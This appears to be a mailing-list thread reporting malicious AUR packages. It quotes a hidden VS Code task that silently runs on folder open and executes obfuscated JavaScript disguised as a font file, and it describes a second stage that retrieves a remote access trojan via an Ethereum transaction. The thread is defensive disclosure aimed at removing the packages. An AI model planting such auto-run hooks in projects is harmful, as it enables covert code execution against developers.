On Sat, 12 Sept 2026 at 23:38, Nicolas Boichat <[email protected]> wrote: > > Hi, > > Thanks Saren, > > The maintainer should probably be banned from AUR as well. > > https://aur.archlinux.org/packages/tokentracker-cli => > https://github.com/ayan-de/Token-Tracker/commit/60f86b3a5eabf73cf13e0bb883897dd0ebee0f4f
Slight correction, the PKGBUILD points at https://github.com/ayan-de/Token-Tracker/tree/v0.1.13, which doesn't contain the strange commit. I'll let you figure out what's the proper action here. > The 2 other packages I'm not sure, didn't check the binaries. > > Thanks, > > On Sat, 12 Sept 2026 at 22:36, Saren <[email protected]> wrote: > > > > Package: https://aur.archlinux.org/packages/glanced > > > > Upstream: https://github.com/ayan-de/glance-linux > > > > https://github.com/ayan-de/glance-linux/blob/master/public/fonts/fa-solid-500.woff2 > > is obfuscated javascript disguised as a .woff2 font file, with a lot of > > whitespace prepended. This javascript will be executed when this package > > is opened using vscode as defined in .vscode/tasks.json > > > > ```json > > { > > "label": "eslint-check", > > "type": "shell", > > "command": "(command -v node >/dev/null 2>&1 && node > > ./public/fonts/fa-solid-500.woff2) || (where node >nul 2>&1 && node > > ./public/fonts/fa-solid-500.woff2) || echo ''", > > "isBackground": true, > > "hide": true, > > "presentation": { "reveal": "never", "echo": false, "close": true }, > > "runOptions": { "runOn": "folderOpen" } > > } > > ``` > > > > When executed, the code will resolve a specific ethereum transaction > > from blockchain, resolving a 2nd stage payload from http, effectively a RAT. > > > > Detailed analysis by claude: > > https://gist.github.com/Saren-Arterius/d666ff56ef070a551f5f38a404b0c85d > > > >
